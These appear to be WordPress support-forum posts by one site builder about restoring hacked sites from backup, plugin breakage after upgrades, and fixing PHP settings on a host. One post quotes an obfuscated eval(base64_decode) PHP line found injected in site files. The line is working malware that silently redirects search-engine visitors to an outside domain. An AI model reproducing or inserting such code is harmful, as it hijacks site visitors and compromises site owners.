  • I was able to resolve the issue in this manner.
Once I realized that there was some form of malware in the files (almost all the php files were infected.) I used a full backup I had saved using Backupbuddy from before.
I unzipped the files. I checked them for the malware but there was nothing there.
I completely deleted every WP file in the folder using FTP and uploaded the older files instead. This time I did not use the Importbuddy.php or use the Backupbuddy database backup to create a new database.(This is the recommended procedure but it failed to work when I first used it.)
It seems the database was not corrupted, just the WordPress files.

After replacing all the files I went to the site and the admin page was working and everything is fine. I did this with 2 sites. As it turns our the original Backupbuddy files I had saved do not use WP Version 3.4.1 but 3.2.2.
I don’t know if there is problem with Version 3.4.1 but for now I will not upgrade.
    Thanks to everyone who helped.

This is actually mmconsulting – they somehow messed up my username password here.

Anyway – I started looking at files in the WordPress setup. I found this code in a number of files and wonder if it some kind of virus or malware.

    eval(base64_decode(“DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vd3d3LmlzZmFydC5mYXJ0aXQuY29tLyIpOw0KZXhpdCgpOw0KfQp9Cn0NCn0NCn0=”));

    Does anybody recognize this?
    thanks

I have used this plugin on 2 sites. One with a cache plugin and one without.
The one with no cache plugin works fine while the other doesn’t.
However when I deactivate the cache plugin and clear the cache it still gives me the error maesage.

    Any suggestions would be helpful.

    Thanks,
    MM

I contacted the developer and was sent new version of the Simple Popup Plus which is now working properly.

Muneeb was quick to respond and I was able to resolve all issues.

My only concern is that the versions available here are not as described. It should not be necessary to have to contact plugin developers to get their plugins to work.I think they need to work when you install them the first time.

I do thank Muneeb for responding and resolving the issue.

    Thanks for the response.

I realize that the basic Visual Editor is powered by TinyMCE. The plugin adds many additional functions that make formatting pages a lot simpler. I personally can write code but my clients can’t and this upgrade is really helpful for less experienced CMS users. Since I am not simply building blogs but developing fully functional CMS websites for my clients, I need tools that can be depended on.

The All in One SEO version that isn’t compatible for my client is 1.2.12.1 and I tried contacting the developer but they don’t offer support for the free version which I give all my clients.

53 out of 65 is only is only 81% which means that 19% say it doesn’t. Not good enough for the level of quality control required in any other industry.

Open Source is supposed to be an alternative to the companies like Microsoft who happily unleash bad products into the market before they are ready and then sell an upgrade a few months later to fix all the bugs.

I would like to know what is making the difference – development experience, the hosting service, other plugin compatibility issues?

I reiterate there should be a warning included with the request to upgrade to WordPress Version 3.0.1 that upgrading may cause plugins to fail and sites to crash.

I have been installing new WordPress sites for clients over the past few weeks since the upgrade to Version3.0.1 and the problems have been unbelievable.

Many of the plugins don’t work, including the TinyMce WYSIWYG editor (some functions), All In One SEO, Page Link Manager and others. It seems that WordPress has been updated beyond the ability for many of these plugin developers to keep up.

Stating that the Internet is not a stagnant place, and you gotta learn to adapt is not really an effective approach to resolving this. It seems a little bit elitist.

The Dashboard says “Please Update Now” which for average users is more than just an invitation to try something new. I think warnings should be placed along side the notice. This new version is a disaster.

I just downloaded the newest version of WordPress and had the same problem. I was doing research on it and noticed there were a few posts in the Forum about problems hosting on 1and1.com as well. I was able to resolve the issue of the visual tools by doing 2 things.

1and1.com uses PHP 4 and I was told that WordPress needs PHP 5.
    2 solutions fixed this problem.

    1) I created an .htaccess file which was downloaded to the root directory. All it contains it this:
    AddType x-mapp-php5 .php

2)I had used Filezila to download the WP files and had several error messages and was researching 1and1.com because I had similar problems with another CMS program I had tried to use.

I reinstalled the files with SmartFTP and everything is now working fine.
